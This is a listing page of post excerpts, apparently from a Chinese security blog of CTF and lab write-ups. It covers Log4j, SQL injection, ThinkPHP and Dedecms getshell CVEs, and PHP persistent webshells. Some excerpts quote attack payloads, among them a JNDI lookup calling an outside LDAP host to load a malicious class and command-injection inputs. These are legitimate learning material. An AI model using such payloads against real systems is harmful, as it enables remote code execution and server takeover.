我的梦想
成为一个快乐的人。
【萌新向】渗透测试靶场考核 【萌新向】渗透测试靶场考核
最近年末了,单位有了渗透的考核 对于我这个几乎没有玩过内网的同学简直是非常难过! 靶场搭建再了单位的一台Thinkpad上,但是!路由器经常会炸,在后面我会解释一下为啥提前说一下这个 由于时间短,我没有完成整个渗透的过程,就简单记录一下渗透
2022-01-10
长安“战疫”网络安全卫士守护赛 部分wp 长安“战疫”网络安全卫士守护赛 部分wp
八卦迷宫折磨!!!! cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang} RCE_No_ParaPHP无参数RCE 参考自:https
2022-01-08
2021SCTF-Loginme 2021SCTF-Loginme
最近也是刚刚放假,比较忙,就看了看这个SCTF 比赛快到尾声的时候才抽出空来看看题 按照惯例,肯定是要看看分最少的题 这道题被我看中了,我打算研究一下这个题 附件是一份源码,而且是go语言的源码 我们来看一看 题中源码给了middlewa
2021-12-28
CTFSHOWLog4j复现 CTFSHOWLog4j复现
今天上午刚刚看完这个洞,自己复现了一下,晚上就看到了上题正好打一下玩玩 多明显的输入框,嘿嘿嘿 这不得来一个 ${jndi:ldap://dnslog.com/exp} (bushi 0x01 准备工作首先准备好恶意Java类 pub
2021-12-10
SQL注入基础 SQL注入基础
什么是SQL注入理解SQL注入SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器加以解析并执行 /sql.php?uid=1 /sql.php?uid=1 or 1=1 SQL
2021-12-06
Thinkphp < 6.0.2 session id未作过滤导致getshell Thinkphp < 6.0.2 session id未作过滤导致getshell
Thinkphp < 6.0.2 session id未作过滤导致getshell一、漏洞简介Thinkphp < 6.0.2 session id未作过滤导致getshell 二、漏洞影响Thinkphp < 6.0.2
2021-11-22
PHP不死马初探 PHP不死马初探
什么是不死马内存马,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。 流程大概为:不死马.php–>上传到服务器–>服务器执行–>在服务器上循环生成 用以上流程达到不死的效果 可用的php函数
2021-11-22
CVE-2019-9081 Laravel5.7 反序列化 RCE CVE-2019-9081 Laravel5.7 反序列化 RCE
CVE-2019-9081 Laravel5.7 反序列化 RCE漏洞的复现
2021-11-16
Nepnep两岁生日 Nepnep两岁生日
今天是Nepnep联合战队的2岁生日,也是我来到这个战队的第8个月,也是我踏入安全这个行业的第8个月,我很笨,别人学习一个小时的知识,我需要学习1小天,前后斟酌了很久也没想好要不要踏入网络安全这一行业,当时我只是一个平平无奇的大二学生,成绩
2021-11-15
2021湖湘杯web部分wp 2021湖湘杯web部分wp
easywill本人sb,写好的wp被窝删掉了QAQ 很简单的一道题包含pearcmd.php(审计一下源码就能看到) 好像竞争上传也可以(没试) payload还记得 /index.php?+config-create+/&&am
2021-11-14
CVE-2019-8362 Dedecms v5.7 sp2 后台文件上传 getshell CVE-2019-8362 Dedecms v5.7 sp2 后台文件上传 getshell
CVE-2019-8362 Dedecms v5.7 sp2 后台文件上传 getshell一、漏洞简介上传zip文件解压缩对于文件名过滤不周,导致getshell 二、漏洞影响Dedecms v5.7 sp2 三、漏洞原理在dede/a
2021-11-14
CTFSHOW命令执行 CTFSHOW命令执行
CTFSHOW命令执行web29过滤了flag payload: 随便写几个姿势 /?c=system("nl fl??????"); /?c=system("nl fl*"); /?c=system("nl fla''g.php"); /
2021-11-11
1 / 2